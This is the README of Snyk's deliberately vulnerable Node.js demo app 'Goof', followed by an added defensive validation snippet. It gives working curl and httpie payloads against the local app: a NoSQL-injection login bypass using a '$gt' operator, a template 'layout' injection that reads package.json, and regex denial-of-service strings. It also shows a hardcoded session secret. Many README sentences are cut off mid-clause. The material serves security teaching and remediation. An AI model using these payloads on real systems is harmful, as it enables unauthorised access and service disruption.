Open source project: snyk-labs/nodejs-goof
Repository: https://github.com/snyk-labs/nodejs-goof
Language: JavaScript 52.5%
Project description:

Goof - Snyk's vulnerable demo app

A vulnerable Node.js demo application, based on the Dreamers Lab tutorial.

Features

This vulnerable app includes the following capabilities to experiment with:
Running

mongod &
git clone https://github.com/snyk-labs/nodejs-goof
npm install
npm start

This will run Goof locally, using a local mongo on the default port and listening on port 3001 (http://localhost:3001).

Running with docker-compose

docker-compose up --build
docker-compose down

Heroku usage

Goof requires attaching a MongoLab service to be deployed as a Heroku app. That sets up the MONGOLAB_URI env var so everything after should just work.

CloudFoundry usage

Goof requires attaching a MongoLab service and naming it "goof-mongo" to be deployed on CloudFoundry. The code explicitly looks for credentials to that service.

Cleanup

To bulk delete the current list of TODO items from the DB run:

npm run cleanup

Exploiting the vulnerabilities

This app uses npm dependencies holding known vulnerabilities, as well as insecure code that introduces code-level vulnerabilities. The

Vulnerabilities in open source dependencies

Here are the exploitable vulnerable packages:
Vulnerabilities in code

Code injection

The page at The same view is used for both the GET request which shows the account details, as well as the form itself for a POST request which updates the account details. A so-called Server-side Rendering. The form is completely functional. The way it works is, it receives the profile information from the You'd think that what's the worst that can happen because we use a validation to confirm the expected input, however the validation doesn't take into account a new field that can be added to the object, such as

curl -X 'POST' --cookie c.txt --cookie-jar c.txt -H 'Content-Type: application/json' --data-binary '{"username": "[email protected]", "password": "SuperSecretPassword"}' 'http://localhost:3001/login'

curl -X 'POST' --cookie c.txt --cookie-jar c.txt -H 'Content-Type: application/json' --data-binary '{"email": "[email protected]", "firstname": "admin", "lastname": "admin", "country": "IL", "phone": "+972551234123", "layout": "./../package.json"}' 'http://localhost:3001/account_details'

Actually, there's even another vulnerability in this code.
The

curl -X 'POST' -H 'Content-Type: application/json' --data-binary "{\"email\": \"`seq -s "" -f "<" 100000`\"}" 'http://localhost:3001/account_details'

The

curl -X 'POST' -H 'Content-Type: application/json' --data-binary "{\"email\": \"[email protected]\", \"country\": \"nop\", \"phone\": \"0501234123\", \"lastname\": \"nop\", \"firstname\": \"`node -e 'console.log(" ".repeat(100000) + "!")'`\"}" 'http://localhost:3001/account_details'

NoSQL injection

A POST request to We can send a request with an incorrect password to see that we get a failed attempt:

echo '{"username":"[email protected]", "password":"WrongPassword"}' | http --json $GOOF_HOST/login -v

And another request, as denoted with the following JSON request to sign in as the admin user, works as expected:

echo '{"username":"[email protected]", "password":"SuperSecretPassword"}' | http --json $GOOF_HOST/login -v

However, what if the password wasn't a string? What if it was an object? Why would an object be harmful or even considered an issue? Consider the following request:

echo '{"username": "[email protected]", "password": {"$gt": ""}}' | http --json $GOOF_HOST/login -v

We know the username, and we pass on what seems to be an object of some sort.
That object structure is passed as-is to the

Open redirect

The
One fault here is that the
To exploit the open redirect, simply provide a URL such as

Hardcoded values - session information

The application initializes a cookie-based session on

app.use(session({
  secret: 'keyboard cat',
  name: 'connect.sid',
  cookie: { secure: true }
}))

As you can see, the session

A first attempt to fix it can be to move it out to a config file such as:

module.exports = {
  cookieSecret: `keyboard cat`
}

And then require the configuration file and use it to initialize the session. However, that still maintains the secret information inside another file, and Snyk Code will warn you about it.

Another case we can discuss here in session management is that the cookie setting is initialized with

Snyk Code will also find hardcoded secrets in source code that isn't part of the application logic, such as

Docker Image Scanning

The

To scan the image for vulnerabilities, run:

snyk test --docker node:6-stretch --file=Dockerfile

To monitor this image and receive alerts with Snyk:

snyk monitor --docker node:6-stretch

Runtime Alerts

Snyk provides the ability to monitor application runtime behavior and detect an invocation of a function that is known to be vulnerable and used within open source dependencies that the application makes use of. The agent is installed and initialized in app.js. For the agent to report back to your Snyk account on the vulnerabilities it detected, it needs to know which project on Snyk to associate with the monitoring. Due to that, we need to provide it with the project id through an environment variable.

To run the Node.js app with runtime monitoring:

SNYK_PROJECT_ID=<PROJECT_ID> npm start

** The app will continue to work normally even if not provided a project id

Fixing the issues

To find these flaws in this application (and in your own apps), run:

In this application, the default
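Defensive counterparts to the three code-level issues described above (a non-string password reaching the Mongo query, an unexpected "layout" field and oversized values reaching the profile view, and the hardcoded session secret), as an added example that is not part of the nodejs-goof repository. The field names follow the requests shown above; MAX_FIELD_LENGTH, the SESSION_SECRET variable name and the sample addresses are assumptions.

```javascript
// Added example, not code from the nodejs-goof repository: request-shape
// checks for the /login and /account_details handlers discussed above.
// Assumes an Express-style req.body that has already been parsed from JSON.

const MAX_FIELD_LENGTH = 256; // assumed cap; very long inputs are what make a slow regex expensive

// NoSQL injection: JSON lets a client send an object where a string is expected,
// and MongoDB treats keys such as $gt as query operators. Only query with strings.
function parseLoginBody(body) {
  if (body === null || typeof body !== 'object') {
    return { ok: false, reason: 'body must be a JSON object' };
  }
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return { ok: false, reason: 'username and password must be strings' };
  }
  return { ok: true, username, password };
}

// Mass assignment: the posted profile object is handed to the view engine, so
// an unexpected key such as "layout" reaches the template renderer. Copy only
// the fields the form carries, and bound their length before any pattern-based
// validation runs.
const ACCOUNT_FIELDS = ['email', 'firstname', 'lastname', 'country', 'phone'];
function pickAccountFields(body) {
  const profile = {};
  const dropped = [];
  for (const [key, value] of Object.entries(body || {})) {
    const allowed = ACCOUNT_FIELDS.includes(key) &&
      typeof value === 'string' && value.length <= MAX_FIELD_LENGTH;
    if (allowed) profile[key] = value; else dropped.push(key);
  }
  return { profile, dropped };
}

// Hardcoded secret: take the session secret from the environment and refuse to
// start without one instead of falling back to a literal such as 'keyboard cat'.
function readSessionSecret(env) {
  const secret = env.SESSION_SECRET; // assumed variable name
  if (typeof secret !== 'string' || secret.length < 32) {
    throw new Error('SESSION_SECRET must be set to at least 32 characters');
  }
  return secret;
}

// Constructed sample requests mirroring the shapes discussed above.
const operatorPassword = { username: 'user@example.com', password: { $gt: '' } };
const layoutOverride = { email: 'user@example.com', firstname: 'a'.repeat(1000),
  layout: './../package.json' };
```

Wiring these in means calling parseLoginBody before the Mongo lookup and rendering the view with pickAccountFields(req.body).profile rather than req.body itself.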